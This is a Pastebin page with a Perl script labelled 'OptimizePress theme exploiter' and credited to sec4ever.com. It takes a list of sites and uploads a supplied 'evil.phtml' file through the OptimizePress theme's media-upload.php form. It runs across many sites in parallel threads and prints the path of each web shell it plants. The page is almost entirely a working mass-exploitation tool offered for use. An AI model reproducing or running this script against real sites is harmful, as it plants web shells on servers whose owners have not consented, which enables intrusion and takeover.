Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # OptimizePress theme exploiter
- # (c) sec4ever.com
- use WWW::Mechanize;
- use threads;
- defined($ARGV[0] && $ARGV[1] && $ARGV[2]) ? $file = $ARGV[0] : die "+ usage: perl $0 sites.txt evil.phtml threads\n";
- print "[+] sec4ever.com\n";
- $evil = $ARGV[1];
- $thr = $ARGV[2];
- open(sites,"<".$file) or die $!;
- while($site = <sites>)
- {
- chomp($site);
- $site = cleanurl($site);
- push(@threads, threads->create (\&ex, $site));
- sleep(1) while(scalar threads->list(threads::running) >= $thr);
- }
- eval {
- $_->join foreach @threads;
- @threads = ();
- };
- close(sites);
- sub ex {
- print " + $site | ";
- eval{
- $ex = WWW::Mechanize->new(timeout => 10);
- $ex->get("http://".$_[0]."/wp-content/themes/OptimizePress/lib/admin/media-upload.php");
- $ex->submit_form(
- form_id => "csimgupload",
- fields => {
- newcsimg => $evil
- });
- };
- if($ex->content() =~ /<img src=\"(.*?)$ARGV[1]"/)
- {
- print "shell: ".$1.$ARGV[1]."\n";
- }else{
- print "faild\n";
- }
- }
- sub cleanurl {
- $_[0] =~ /http[s]?:\/\/[www\.]{3}?[\.]?/g ? $_[0] =~ s/http[s]?:\/\/[www\.]{3}?[\.]?//g : "";
- $_[0] =~ /http[s]?:\/\//g ? $_[0] =~ s/http[s]?:\/\///g : "";
- $_[0] =~ /[\/]$/m ? $_[0] =~ s/[\/]$// : "";
- return $_[0];
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement